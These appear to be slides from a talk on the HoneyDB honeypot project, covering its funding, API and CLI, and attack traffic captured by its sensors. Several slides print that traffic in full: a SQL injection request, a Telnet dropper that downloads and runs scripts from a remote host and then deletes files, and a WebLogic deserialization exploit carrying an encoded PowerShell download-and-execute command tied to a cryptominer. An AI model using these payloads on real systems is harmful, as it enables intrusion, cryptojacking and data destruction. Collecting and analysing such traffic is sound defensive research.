 Greater privacy of transactions Performing immediate transactions Participation in proceedings and voting Activate budgeting and cashier system in cryptocurrencies
  • 63. HoneyDB - How To Money? Currently running 5 masternodes across 2 VPS Yields about $100 to $200 per month.
  • 64. HoneyDB - But that crypto though. Masternodes have potential, but requires an initial investment, and at the mercy of market volatility.
  • 65. HoneyDB - How to money? Other options
 Sponsorships Commercial Licensing
  • 66. HoneyDB - Back To HaaS Tools to get you honeypotting ● Honeydb-agent ○ Like HoneyPy, but a binary ● API Endpoints ● HoneyDB CLI
  • 67. HoneyDB - New API Endpoints ● Bad-host (filtered) ● Sensor Data Count (filtered) ● Sensor Data (filtered) Filtered means it’s only the data from your sensors.
  • 68. HoneyDB - New API Client Wrapper and CLI pip install honeydb usage: honeydb [-h] [--bad-hosts] [--sensor-data-count] [--sensor-data] [--threatbin] [--twitter-threat-feed] [--mydata] [--date DATE] [--ip-address IP_ADDRESS] [--from-id FROM_ID] [--pretty] optional arguments: -h, --help show this help message and exit --bad-hosts Get bad hosts. --sensor-data-count Get sensor data count. --sensor-data Get sensor data. --threatbin Get ThreatBin entries. --twitter-threat-feed Get Twitter Threat Feed. --mydata Filter on mydata. --date DATE Date in format YYYY-MM-DD --ip-address IP_ADDRESS IP address to filter on. --from-id FROM_ID ID to continue retrieving sensor data. --pretty Print JSON in pretty format.
  • 69. HoneyDB - Examples... Web GET /hcl/inc/install/checkout.asp?cartid1111111111111'%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR (45,120,50,45,81,45)--%20%20 HTTP/1.1 Host: x.x.x.x Accept: */* Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.76.233.99/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 45.76.233.99 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 45.76.233.99; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.76.233.99 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
  • 70. HoneyDB - Examples... POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 64.137.163.142:7001 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0 Connection: Close Content-Type: text/xml Content-Length: 1216 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.8.0_131" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>cmd.exe</string> </void> <void index="1"> <string>/c</string> </void> <void index="2"> <string>PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALg BDAGEAcAB0AGkAbwBuADsAJABXAEMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAVwBDAC4ASABlAGEAZABlAHIAc wAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAiAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADIALgAwACAAJABPAFMAIgApADsASQBFAFgAIAAkAFcAQw AuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADIAMwAuADUAOQAuADYAOAAuADEANwAyAC8AQwBhAGMAaABlAC8ARABMAC4 AcABoAHAAJwApADsA</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header>
  • 71. HoneyDB - Examples... $.O.S.=.(.G.e.t.-.W.m.i.O.b.j.e.c.t. .-.C.l.a.s.s. .W.i.n.3.2._.O.p.e.r.a.t.i.n.g.S.y.s.t.e.m.)...C.a.p.t.i.o.n.;.$.W .C.=.N.e.w.-.O.b.j.e.c.t. .N.e.t...W.e.b.C.l.i.e.n.t.;.$.W.C...H.e.a.d.e.r.s...A.d.d.(.'.U.s .e.r.-.A.g.e.n.t.'.,.".P.o.w.e.r.S.h.e.l.l. .v.2...0. .$.O.S.".).;.I.E.X. .$.W.C...D.o.w.n.l.o.a.d.S.t.r.i.n.g.(.'.h.t.t.p.:././.1.2.3...5.9 ...6.8...1.7.2./.C.a.c.h.e./.D.L...p.h.p.'.).;.
  • 72. HoneyDB - @MalwareMechanic ● I analyzed the initial POST you sent me. From there was I was able to pull apart a scanner/worm/RAT! ● It appears to be GhostMiner to mine Monero!
  • 73. HoneyDB - Hmmmmm... $ cat GhostMiner >> HoneyMiner
  • 74. HoneyDB - No no no no...
  • 75. HoneyDB - @MalwareMechanic ● This POST utilizes a Java deserialization vulnerability to execute a base64 encoded PowerShell command. ● This in turn downloads and executes a PowerShell script (hxxp://123.59.68.172/Cache/DL.php). ● Installs a cryptominer via WMI. ● Attempts to stop the various services & tasks before installing the new miner. ● Attempts to stop other miners. ● Attempts to stop processes listening on specific ports. ● Also saw references to powershell_reflective_mimikatz.
  • 76. HoneyDB - Go Forth and Honeypot! honeydb.io Thanks! Questions?